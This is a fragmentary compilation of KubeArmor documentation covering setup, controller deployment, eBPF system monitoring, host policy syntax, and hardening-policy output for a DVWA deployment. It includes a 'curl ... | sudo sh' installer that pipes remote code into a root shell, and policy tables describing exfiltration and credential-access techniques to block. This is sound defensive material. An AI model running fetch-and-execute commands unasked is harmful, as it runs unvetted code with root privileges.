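For example (the hostname values below are hypothetical):
hostname                                      # e.g., prints KubeArmor-Dev (mixed case)
kubectl get nodes -o wide                     # shows the node as kubearmor-dev (lowercase)
sudo hostnamectl set-hostname kubearmor-dev   # change the actual hostname to lowercase so the two match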
KubeArmor Controller
Starting from KubeArmor v0.11 - annotations, container policies, and host policies are handled via kubearmor controller, the controller code can be found under pkg/KubeArmorController
.
To install the controller from KubeArmor docker repository run
To install the controller (local version) to your cluster run
If you need to set up a local registry to push your image, use the docker-registry.sh script under the ~/KubeArmor/contribution/local-registry directory.
Here, we briefly give you an overview of KubeArmor's directories.
Source code for KubeArmor (/KubeArmor)
Source code for KubeArmor Controller (CRD)
Deployment tools and files for KubeArmor
Files for testing
KubeArmor supports attack prevention, not just observability and monitoring. More importantly, the prevention is handled inline: even before a process is spawned, a rule can deny execution of a process. Most other systems typically employ "post-attack mitigation" that kills a process/pod after malicious intent is observed, allowing an attacker to execute code on the target environment. Essentially KubeArmor uses inline mitigation to reduce the attack surface of a pod/container/VM. KubeArmor leverages best of breed Linux Security Modules (LSMs) such as AppArmor, BPF-LSM, and SELinux (only for host protection) for inline mitigation. LSMs have several advantages over other techniques:
KubeArmor does not change anything with the pod/container.
KubeArmor does not require any changes at the host level or at the CRI (Container Runtime Interface) level to enforce blocking rules. KubeArmor deploys as a non-privileged DaemonSet with certain capabilities that allows it to monitor other pods/containers and the host.
A given cluster can have multiple nodes utilizing different LSMs. KubeArmor abstracts away the complexities of the LSMs and provides an easy way to enforce policies, managing the LSM specifics under the hood.
Post-exploit Mitigation works by killing a suspicious process in response to an alert indicating malicious intent.
The attacker is allowed to execute a binary. The attacker could disable security controls, access logs, etc., to circumvent attack detection.
By the time a malicious process is killed, sensitive contents could have already been deleted, encrypted, or transmitted.
, “post-exploitation detection/mitigation is at the mercy of an exploit writer putting little to no effort into avoiding tripping these detection mechanisms.”
allows one to specify or policies.
This approach has multiple problems:
It is often difficult to predict which LSM (AppArmor or SELinux) would be available on the target node.
BPF-LSM is not supported by Pod Security Context.
It is difficult to manually specify an AppArmor or SELinux policy. Changing default AppArmor or SELinux policies might result in more security holes since it is difficult to decipher the implications of the changes and can be counter-productive.
Different managed cloud providers use different default distributions. Google GKE COS uses AppArmor by default, AWS Bottlerocket uses BPF-LSM and SELinux, and AWS Amazon Linux 2 uses only SELinux by default. Thus it is challenging to use Pod Security Context in multi-cloud deployments.
References:
Vagrant - v2.2.9
VirtualBox - v6.1
$ git clone https://github.com/kubearmor/KubeArmor.git
$ cd KubeArmor/contribution/vagrant
~/KubeArmor/contribution/vagrant$ ./setup.sh
~/KubeArmor/contribution/vagrant$ sudo reboot
~/KubeArmor/KubeArmor$ make vagrant-up
~/KubeArmor/KubeArmor$ make vagrant-ssh
~/KubeArmor/KubeArmor$ make vagrant-destroy
~/KubeArmor/KubeArmor$ make vagrant-up NETNEXT=1
~/KubeArmor/KubeArmor$ vi Makefile
OS - Ubuntu 18.04
Kubernetes - v1.19
Docker - 18.09 or Containerd - 1.3.7
Linux Kernel - v4.15
LSM - AppArmor
$ cd KubeArmor/contribution/self-managed-k8s
~/KubeArmor/contribution/self-managed-k8s$ ./setup.sh
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make
$ kubectl proxy &
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make run
$ cd KubeArmor/pkg/KubeArmorController
~/KubeArmor/pkg/KubeArmorController$ make deploy
$ cd KubeArmor/pkg/KubeArmorController
~/KubeArmor/pkg/KubeArmorController$ make docker-build deploy
KubeArmor/
BPF - eBPF code for system monitor
common - Libraries internally used
config - Configuration loader
core - The main body (start point) of KubeArmor
enforcer - Runtime policy enforcer (enforcing security policies into LSMs)
feeder - gRPC-based feeder (sending audit/system logs to a log server)
kvmAgent - KubeArmor VM agent
log - Message logger (stdout)
monitor - eBPF-based system monitor (mapping process IDs to container IDs)
policy - gRPC service to manage Host Policies for VM environments
types - Type definitions
protobuf/ - Protocol buffer
pkg/KubeArmorController/ - KubeArmorController generated by Kube-Builder for KubeArmor Annotations, KubeArmorPolicy and KubeArmorHostPolicy
deployments/
<cloud-platform-name> - Deployments specific to respective cloud platform (deprecated - use karmor install or helm)
controller - Deployments for installing KubeArmorController along with cert-manager
CRD - KubeArmorPolicy and KubeArmorHostPolicy CRDs
get - Stores source code for deploygen, a tool used for specifying kubearmor deployments
helm/
KubeArmor - KubeArmor's Helm chart
KubeArmorOperator - KubeArmorOperator's Helm chart
examples/ - Example microservices for testing
tests/ - Automated test framework for KubeArmor
# simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: block-sensitive-file-read
namespace: default
spec:
selector:
matchLabels:
app: sensitive-data # Policy applies to containers/pods with this label
file:
matchPaths:
- path: /sensitive/config # Specific file to protect
readOnly: true # Protect against writes too, but let's focus on read
action: Block # If read is attempted, block it
// KubeArmor/core/k8sHandler.go (Simplified)
// WatchK8sPods Function
func (kh *K8sHandler) WatchK8sPods(nodeName string) *http.Response {
// ... code to build API request URL ...
// The URL includes '?watch=true' to get a stream of events
URL := "https://" + kh.K8sHost + ":" + kh.K8sPort + "/api/v1/pods?watch=true"
// ... code to make HTTP request to K8s API server ...
// Returns a response stream where KubeArmor reads events
resp, err := kh.WatchClient.Do(req)
if err != nil {
return nil // Handle error
}
return resp
}
// ... similar functions exist to watch Nodes and Policies ...
// KubeArmor/core/dockerHandler.go (Simplified)
// GetContainerInfo Function
func (dh *DockerHandler) GetContainerInfo(containerID string, OwnerInfo map[string]tp.PodOwner) (tp.Container, error) {
if dh.DockerClient == nil {
return tp.Container{}, errors.New("no docker client")
}
// Ask the Docker daemon for details about a specific container ID
inspect, err := dh.DockerClient.ContainerInspect(context.Background(), containerID)
if err != nil {
return tp.Container{}, err // Handle error
}
container := tp.Container{}
container.ContainerID = inspect.ID
container.ContainerName = strings.TrimLeft(inspect.Name, "/")
// Get Kubernetes specific labels if available (e.g., for Pod name, namespace)
containerLabels := inspect.Config.Labels
if val, ok := containerLabels["io.kubernetes.pod.namespace"]; ok {
container.NamespaceName = val
}
if val, ok := containerLabels["io.kubernetes.pod.name"]; ok {
container.EndPointName = val // In KubeArmor types, EndPoint often refers to a Pod or standalone Container
}
// ... get other details like image, apparmor profile, privileged status ...
// Get the *host* PID of the container's main process
pid := strconv.Itoa(inspect.State.Pid)
// Read /proc/<host-pid>/ns/pid and /proc/<host-pid>/ns/mnt to get Namespace IDs
if data, err := os.Readlink(filepath.Join(cfg.GlobalCfg.ProcFsMount, pid, "/ns/pid")); err == nil {
fmt.Sscanf(data, "pid:[%d]\n", &container.PidNS)
}
if data, err := os.Readlink(filepath.Join(cfg.GlobalCfg.ProcFsMount, pid, "/ns/mnt")); err == nil {
fmt.Sscanf(data, "mnt:[%d]\n", &container.MntNS)
}
// ... store labels, etc. ...
return container, nil
}
// KubeArmor/monitor/processTree.go (Simplified)
// NsKey Structure (used as map key)
type NsKey struct {
PidNS uint32
MntNS uint32
}
// LookupContainerID Function
// This function is used when an event comes in with PidNS and MntNS
func (mon *SystemMonitor) LookupContainerID(pidns, mntns uint32) string {
key := NsKey{PidNS: pidns, MntNS: mntns}
mon.NsMapLock.RLock() // Use read lock for looking up
defer mon.NsMapLock.RUnlock()
if val, ok := mon.NsMap[key]; ok {
// If the key (Namespace IDs) is in the map, return the ContainerID
return val
}
// Return empty string if not found (might be a host process)
return ""
}
// AddContainerIDToNsMap Function
// This function is called when KubeArmor discovers a new container
func (mon *SystemMonitor) AddContainerIDToNsMap(containerID string, namespace string, pidns, mntns uint32) {
key := NsKey{PidNS: pidns, MntNS: mntns}
mon.NsMapLock.Lock() // Use write lock for modifying the map
defer mon.NsMapLock.Unlock()
// Store the mapping: Namespace IDs -> Container ID
mon.NsMap[key] = containerID
// ... also updates other maps related to namespaces and policies ...
}
Container - identified by Container ID, PID Namespace ID, Mount Namespace ID, Pod Name, Namespace, and Labels (sourced from the Kubernetes API and the container runtime)
Node - identified by Node Name, Node Labels, and Operating System Info (sourced from the Kubernetes API and host OS APIs)
KubeArmor is a security solution for Kubernetes and cloud-native platforms that helps protect your workloads from attacks and threats. It does this by providing a set of hardening policies that are based on industry-leading compliance and attack frameworks such as CIS, MITRE, NIST-800-53, and STIGs. These policies are designed to help you secure your workloads in a way that is compliant with these frameworks and recommended best practices.
One of the key features of KubeArmor is that it provides these hardening policies out-of-the-box, meaning that you don't have to spend time researching and configuring them yourself. Instead, you can simply apply the policies to your workloads and immediately start benefiting from the added security that they provide.
Additionally, KubeArmor presents these hardening policies in the context of your workload, so you can see how they will be applied and what impact they will have on your system. This allows you to make informed decisions about which policies to apply, and helps you understand the trade-offs between security and functionality.
Overall, KubeArmor is a powerful tool for securing your Kubernetes workloads, and its out-of-the-box hardening policies based on industry-leading compliance and attack frameworks make it easy to get started and ensure that your system is as secure as possible.
Hardening policies are derived from industry-leading compliance standards and attack frameworks such as CIS, MITRE, NIST, STIGs, and several others. KubeArmor Policy Templates contains the latest hardening policies.
KubeArmor client tool (karmor) provides a way (karmor recommend
) to fetch the policies in the context of the kubernetes workloads or specific container using command line.
The output is a set of KubeArmorPolicy
or KubeArmorHostPolicy
that can be applied using k8s native tools (such as kubectl apply
).
The rules in hardening policies are based on inputs from:
Several others...
Pre-requisites:
Install KubeArmor
curl -sfL http://get.kubearmor.io/ | sudo sh -s -- -b /usr/local/bin && karmor install
Get the hardening policies in the context of all the deployments in namespace NAMESPACE:
karmor recommend -n NAMESPACE
The recommended policies would be available in the out
folder.
❯ karmor recommend -n dvwa
INFO[0000] pulling image image="cytopia/dvwa:php-8.1"
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-maintenance-tool-access.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-cert-access.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-owner-discovery.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-deny-write-under-bin-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-write-under-dev-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-detect-access-to-cronjob-files.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-least-functionality-execute-package-management-process-in-container.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-remote-file-copy.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-in-shm-folder.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-under-etc-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-under-etc-directory.yaml ...
INFO[0000] pulling image image="mariadb:10.1"
created policy out/dvwa-dvwa-mysql/mariadb-10-1-maintenance-tool-access.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-cert-access.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-owner-discovery.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-deny-write-under-bin-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-write-under-dev-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-detect-access-to-cronjob-files.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-least-functionality-execute-package-management-process-in-container.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-remote-file-copy.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-in-shm-folder.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-under-etc-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-under-etc-directory.yaml ...
output report in out/report.txt ...
Deployment | dvwa/dvwa-web
Container | cytopia/dvwa:php-8.1
OS | linux
Arch |
Distro |
Output Directory | out/dvwa-dvwa-web
policy-template version | v0.1.6
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| POLICY | SHORT DESC | SEVERITY | ACTION | TAGS |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-maintenance- | Restrict access to maintenance | 1 | Block | PCI_DSS |
| tool-access.yaml | tools (apk, mii-tool, ...) | | | MITRE |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-cert- | Restrict access to trusted | 1 | Block | MITRE |
| access.yaml | certificated bundles in the OS | | | MITRE_T1552_unsecured_credentials |
| | image | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system-owner- | System Information Discovery | 3 | Block | MITRE |
| discovery.yaml | - block system owner discovery | | | MITRE_T1082_system_information_discovery |
| | commands | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system- | System and Information | 5 | Block | NIST NIST_800-53_AU-2 |
| monitoring-deny-write-under-bin- | Integrity - System Monitoring | | | NIST_800-53_SI-4 MITRE |
| directory.yaml | make directory under /bin/ | | | MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system- | System and Information | 5 | Audit | NIST NIST_800-53_AU-2 |
| monitoring-write-under-dev- | Integrity - System Monitoring | | | NIST_800-53_SI-4 MITRE |
| directory.yaml | make files under /dev/ | | | MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system- | System and Information | 5 | Audit | NIST SI-4 |
| monitoring-detect-access-to- | Integrity - System Monitoring | | | NIST_800-53_SI-4 |
| cronjob-files.yaml | Detect access to cronjob files | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-least- | System and Information | 5 | Block | NIST |
| functionality-execute-package- | Integrity - Least | | | NIST_800-53_CM-7(4) |
| management-process-in- | Functionality deny execution | | | SI-4 process |
| container.yaml | of package manager process in | | | NIST_800-53_SI-4 |
| | container | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-remote- | The adversary is trying to | 5 | Block | MITRE |
| file-copy.yaml | steal data. | | | MITRE_TA0008_lateral_movement |
| | | | | MITRE_TA0010_exfiltration |
| | | | | MITRE_TA0006_credential_access |
| | | | | MITRE_T1552_unsecured_credentials |
| | | | | NIST_800-53_SI-4(18) NIST |
| | | | | NIST_800-53 NIST_800-53_SC-4 |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write-in- | The adversary is trying to | 5 | Block | MITRE_execution |
| shm-folder.yaml | write under shm folder | | | MITRE |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write- | The adversary is trying to | 5 | Block | NIST_800-53_SI-7 NIST |
| under-etc-directory.yaml | avoid being detected. | | | NIST_800-53_SI-4 NIST_800-53 |
| | | | | MITRE_T1562.001_disable_or_modify_tools |
| | | | | MITRE_T1036.005_match_legitimate_name_or_location |
| | | | | MITRE_TA0003_persistence |
| | | | | MITRE MITRE_T1036_masquerading |
| | | | | MITRE_TA0005_defense_evasion |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write- | Adversaries may delete or | 5 | Block | NIST NIST_800-53 NIST_800-53_CM-5 |
| under-etc-directory.yaml | modify artifacts generated | | | NIST_800-53_AU-6(8) |
| | within systems to remove | | | MITRE_T1070_indicator_removal_on_host |
| | evidence. | | | MITRE MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
Deployment | dvwa/dvwa-mysql
Container | mariadb:10.1
OS | linux
Arch |
Distro |
Output Directory | out/dvwa-dvwa-mysql
policy-template version | v0.1.6
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| POLICY | SHORT DESC | SEVERITY | ACTION | TAGS |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-maintenance-tool- | Restrict access to maintenance | 1 | Block | PCI_DSS |
| access.yaml | tools (apk, mii-tool, ...) | | | MITRE |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-cert-access.yaml | Restrict access to trusted | 1 | Block | MITRE |
| | certificated bundles in the OS | | | MITRE_T1552_unsecured_credentials |
| | image | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-owner- | System Information Discovery | 3 | Block | MITRE |
| discovery.yaml | - block system owner discovery | | | MITRE_T1082_system_information_discovery |
| | commands | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring- | System and Information | 5 | Block | NIST NIST_800-53_AU-2 |
| deny-write-under-bin-directory.yaml | Integrity - System Monitoring | | | NIST_800-53_SI-4 MITRE |
| | make directory under /bin/ | | | MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring- | System and Information | 5 | Audit | NIST NIST_800-53_AU-2 |
| write-under-dev-directory.yaml | Integrity - System Monitoring | | | NIST_800-53_SI-4 MITRE |
| | make files under /dev/ | | | MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring- | System and Information | 5 | Audit | NIST SI-4 |
| detect-access-to-cronjob-files.yaml | Integrity - System Monitoring | | | NIST_800-53_SI-4 |
| | Detect access to cronjob files | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-least-functionality- | System and Information | 5 | Block | NIST |
| execute-package-management-process- | Integrity - Least | | | NIST_800-53_CM-7(4) |
| in-container.yaml | Functionality deny execution | | | SI-4 process |
| | of package manager process in | | | NIST_800-53_SI-4 |
| | container | | | |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-remote-file- | The adversary is trying to | 5 | Block | MITRE |
| copy.yaml | steal data. | | | MITRE_TA0008_lateral_movement |
| | | | | MITRE_TA0010_exfiltration |
| | | | | MITRE_TA0006_credential_access |
| | | | | MITRE_T1552_unsecured_credentials |
| | | | | NIST_800-53_SI-4(18) NIST |
| | | | | NIST_800-53 NIST_800-53_SC-4 |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-in-shm- | The adversary is trying to | 5 | Block | MITRE_execution |
| folder.yaml | write under shm folder | | | MITRE |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-under-etc- | The adversary is trying to | 5 | Block | NIST_800-53_SI-7 NIST |
| directory.yaml | avoid being detected. | | | NIST_800-53_SI-4 NIST_800-53 |
| | | | | MITRE_T1562.001_disable_or_modify_tools |
| | | | | MITRE_T1036.005_match_legitimate_name_or_location |
| | | | | MITRE_TA0003_persistence |
| | | | | MITRE MITRE_T1036_masquerading |
| | | | | MITRE_TA0005_defense_evasion |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-under-etc- | Adversaries may delete or | 5 | Block | NIST NIST_800-53 NIST_800-53_CM-5 |
| directory.yaml | modify artifacts generated | | | NIST_800-53_AU-6(8) |
| | within systems to remove | | | MITRE_T1070_indicator_removal_on_host |
| | evidence. | | | MITRE MITRE_T1036_masquerading |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
Key highlights:
The hardening policies are available by default in the out folder, separated into directories based on deployment names.
Get an HTML report by using the option --report report.html
with karmor recommend
.
Get hardening policies in context to specific compliance by specifying --tag <CIS/MITRE/...>
option.
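For example, both options can be combined in a single run (the namespace and tag below are illustrative):
karmor recommend -n dvwa --tag MITRE --report report.html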
Welcome back to the KubeArmor tutorial! In the previous chapters, we've built up our understanding of how KubeArmor defines security rules using Security Policies, how it figures out who is performing actions using Container/Node Identity, and how it configures the underlying OS to actively enforce those rules using the Runtime Enforcer.
But even with policies and enforcement set up, KubeArmor needs to constantly know what's happening inside your system. When a process starts, a file is accessed, or a network connection is attempted, KubeArmor needs to be aware of these events to either enforce a policy (via the Runtime Enforcer) or simply record the activity for auditing and visibility.
This is where the System Monitor comes in.
Think of the System Monitor as KubeArmor's eyes and ears inside the operating system on each node. While the Runtime Enforcer acts as the security guard making decisions based on loaded rules, the System Monitor is the surveillance system and log recorder that detects all the relevant activity.
Its main job is to:
Observe: Watch for specific actions happening deep within the Linux kernel, like:
Processes starting or ending.
Files being opened, read, or written.
Network connections being made or accepted.
Changes to system privileges (capabilities).
Collect Data: Gather detailed information about these events (which process, what file path, what network address, etc.).
Add Context: Crucially, it correlates the low-level event data with the higher-level Container/Node Identity information KubeArmor maintains (like which container, pod, or node the event originated from).
Prepare for Logging and Processing: Format this enriched event data so it can be sent for logging (via the Log Feeder) or used by other KubeArmor components.
The System Monitor uses advanced kernel technology, primarily eBPF, to achieve this low-overhead, deep visibility into system activities without requiring modifications to the applications or the kernel itself.
Let's revisit our web server example. We have a policy to Block the web server container (app: my-web-app
) from reading /etc/passwd
.
You apply the Security Policy.
KubeArmor's Runtime Enforcer translates this policy and loads a rule into the kernel's security module (say, BPF-LSM).
An attacker compromises your web server and tries to read /etc/passwd
.
The OS kernel intercepts this attempt (via the BPF-LSM hook configured by the Runtime Enforcer).
Based on the loaded rule, the Runtime Enforcer's BPF program blocks the action.
So, the enforcement worked! The read was prevented. But how do you know this happened? How do you know someone tried to access /etc/passwd
?
This is where the System Monitor is essential. Even when an action is blocked by the Runtime Enforcer, the System Monitor is still observing that activity.
When the web server attempts to read /etc/passwd
:
The System Monitor's eBPF programs, also attached to kernel hooks, detect the file access attempt.
It collects data: the process ID, the file path (/etc/passwd
), the type of access (read).
It adds context: it uses the process ID and Namespace IDs to look up in KubeArmor's internal map and identifies that this process belongs to the container with label app: my-web-app
.
It also sees that the Runtime Enforcer returned an error code indicating the action was blocked.
The System Monitor bundles all this information (who, what, where, when, and the outcome - Blocked) and sends it to KubeArmor for logging.
Without the System Monitor, you would just have a failed system call ("Permission denied") from the application's perspective, but you wouldn't have the centralized, context-rich security alert generated by KubeArmor that tells you which container specifically tried to read /etc/passwd
and that it was blocked by policy.
The System Monitor provides the crucial visibility layer, even for actions that are successfully prevented by enforcement. It also provides visibility for actions that are simply Audited by policy, or even for actions that are Allowed but that you want to monitor.
The System Monitor relies heavily on eBPF programs loaded into the Linux kernel. Here's a simplified flow:
Initialization: When the KubeArmor Daemon starts on a node, its System Monitor component loads various eBPF programs into the kernel.
Hooking: These eBPF programs attach to specific points (called "hooks") within the kernel where system events occur (e.g., just before a file open is processed, or when a new process is created).
Event Detection: When a user application or system process performs an action (like open("/etc/passwd")
), the kernel reaches the attached eBPF hook.
Data Collection (in Kernel): The eBPF program at the hook executes. It can access information about the event directly from the kernel's memory (like the process structure, file path, network socket details). It also collects the process's Namespace IDs, which are later used for the Container/Node Identity lookup.
Event Reporting (Kernel to User Space): The eBPF program packages the collected data (raw event + Namespace IDs) into a structure and sends it to the KubeArmor Daemon in user space using a highly efficient kernel mechanism, typically an eBPF ring buffer.
Data Reception (in KubeArmor Daemon): The System Monitor component in the KubeArmor Daemon continuously reads from this ring buffer.
Context Enrichment: For each incoming event, the System Monitor uses the Namespace IDs provided by the eBPF program to look up the corresponding Container ID, Pod Name, Namespace, and Labels in its internal identity map (the one built by the Container/Node Identity component). It also adds other relevant details like the process's current working directory and parent process.
Log/Alert Generation: The System Monitor formats all this enriched information into a structured log or alert message.
Forwarding: The formatted log is then sent to the Log Feeder component, which is responsible for sending it to your configured logging or alerting systems.
Here's a simple sequence diagram illustrating this:
This diagram shows how the eBPF programs in the kernel are the first point of contact for system events, collecting the initial data before sending it up to the KubeArmor Daemon for further processing, context addition, and logging.
Let's look at tiny snippets from the KubeArmor source code to see hints of how this works.
The eBPF programs (written in C, compiled to BPF bytecode) define the structure of the event data they send to user space. In KubeArmor/BPF/shared.h
, you can find structures like event
:
This shows the event
structure containing key fields like timestamps, Namespace IDs (pid_id
, mnt_id
), the type of event (event_id
), the syscall result (retval
), the command name, and potentially file paths (data
). It also defines the kubearmor_events
map as a BPF_MAP_TYPE_RINGBUF
, which is the mechanism used by eBPF programs in the kernel to efficiently send these event
structures to the KubeArmor Daemon in user space.
On the KubeArmor Daemon side (in Go), the System Monitor component (KubeArmor/monitor/systemMonitor.go
) reads from this ring buffer and processes the events.
This Go code shows:
The SyscallPerfMap
reading from the eBPF ring buffer in the kernel.
Raw event data being sent to the SyscallChannel
.
A loop reading from SyscallChannel
, parsing the raw bytes into a SyscallContext
struct.
Using ctx.PidID
and ctx.MntID
(Namespace IDs) to call LookupContainerID
and get the containerID
.
Packaging the raw context (ContextSys
), parsed arguments (ContextArgs
), and the looked-up ContainerID
into a ContextCombined
struct.
Sending the enriched ContextCombined
event to the ContextChan
.
This ContextCombined
structure is the output of the System Monitor – it's the rich event data with identity context ready for the Log Feeder and other components.
The System Monitor uses different eBPF programs attached to various kernel hooks to monitor different types of activities:
The specific hooks used might vary slightly depending on the kernel version and the chosen Runtime Enforcer configuration (AppArmor/SELinux use different integration points than pure BPF-LSM), but the goal is the same: intercept and report relevant system calls and kernel security hooks.
The System Monitor acts as a fundamental data source:
It provides the event data that the Runtime Enforcer's BPF programs might check against loaded policies in the kernel (BPF-LSM case). Note that enforcement happens at the hook via the rules loaded by the Enforcer, but the Monitor still observes the event and its outcome.
It uses the mappings maintained by the Container/Node Identity component to add context to raw events.
It prepares and forwards structured event logs to the Log Feeder.
Essentially, the Monitor is the "observer" part of KubeArmor's runtime security. It sees everything, correlates it to your workloads, and reports it, enabling both enforcement (via the Enforcer's rules acting on these observed events) and visibility.
In this chapter, you learned that the KubeArmor System Monitor is the component responsible for observing system events happening within the kernel. Using eBPF technology, it detects file access, process execution, network activity, and other critical operations. It enriches this raw data with Container/Node Identity context and prepares it for logging and analysis, providing essential visibility into your system's runtime behavior, regardless of whether an action was allowed, audited, or blocked by policy.
Understanding the System Monitor and its reliance on eBPF is key to appreciating KubeArmor's low-overhead, high-fidelity approach to runtime security. In the next chapter, we'll take a deeper dive into the technology that powers this monitoring (and the BPF-LSM enforcer)
Here is the specification of a host security policy.
Note Please note that for system call monitoring we only support the Audit action, no matter what the value of action is.
For better understanding, you can check .
Now, we will briefly explain how to define a host security policy.
Common
A security policy starts with the base information such as apiVersion, kind, and metadata. The apiVersion and kind would be the same in any security policies. In the case of metadata, you need to specify the name of a policy.
Make sure to use KubeArmorHostPolicy, not KubeArmorPolicy.
Severity
You can specify the severity of a given policy from 1 to 10. This severity will appear in alerts when policy violations happen.
Tags
The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.
Message
The message part is optional. You can add an alert message, and then the message will be presented in alert logs.
NodeSelector
The node selector part is relatively straightforward. Similar to other Kubernetes configurations, you can specify (a group of) nodes based on labels.
If you do not have any custom labels, you can use system labels as well.
Process
In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. In the case of matchPatterns, advanced operators may be able to determine particular patterns for executables by using regular expressions. However, we generally do not recommend using this match.
In each match, there are three options.
ownerOnly (static action: allow owner only; otherwise block all)
If this is enabled, only the owners of the executable(s) defined with matchPaths and matchDirectories will be allowed to execute them.
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.
fromSource
If a path is specified in fromSource, the executable at the path will be allowed/blocked to execute the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy as follows. Then, /bin/bash will be only allowed (blocked) to execute /bin/sleep. Otherwise, the execution of /bin/sleep will be blocked (allowed).
File
The file section is quite similar to the process section.
The only difference between 'process' and 'file' is the readOnly option.
readOnly (static action: allow to read only; otherwise block all)
If this is enabled, the read operation will be only allowed, and any other operations (e.g., write) will be blocked.
Network
In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.
Capabilities
In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check available capabilities in .
Syscalls
In the case of syscalls, there are two types of matches: matchSyscalls and matchPaths. matchPaths can be used to target system calls on a specific binary path or anything under a specific directory; additionally, you can slice based on syscalls generated by a binary or a group of binaries in a directory. You can use matchSyscalls as a more general rule to match syscalls from all sources or from specific binaries.
There are two options in each match.
fromSource
If a path is specified in fromSource, KubeArmor will match only syscalls generated by the defined source. For better understanding, let's take the example below. Only unlink system calls generated by /bin/bash will be matched.
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory.
Action
The action could be Audit or Block in general. In order to use the Allow action, you should define 'fromSource'; otherwise, all Allow actions will be ignored by default.
If 'fromSource' is defined, we can use all actions for specific rules.
For system call monitoring, only audit mode is supported, regardless of the configured action.
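Before going through the full specification below, here is a minimal end-to-end sketch of a host policy. The policy name, node hostname, and audited path are hypothetical; it audits execution of /usr/bin/diff on a single node selected by its hostname label.
cat <<'EOF' | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: hsp-audit-diff-exec                   # hypothetical policy name
spec:
  severity: 5
  nodeSelector:
    matchLabels:
      kubernetes.io/hostname: kubearmor-dev   # hypothetical node name
  process:
    matchPaths:
    - path: /usr/bin/diff                     # hypothetical audited executable
  action: Audit
EOF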
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
name: [policy name]
spec:
severity: [1-10] # --> optional
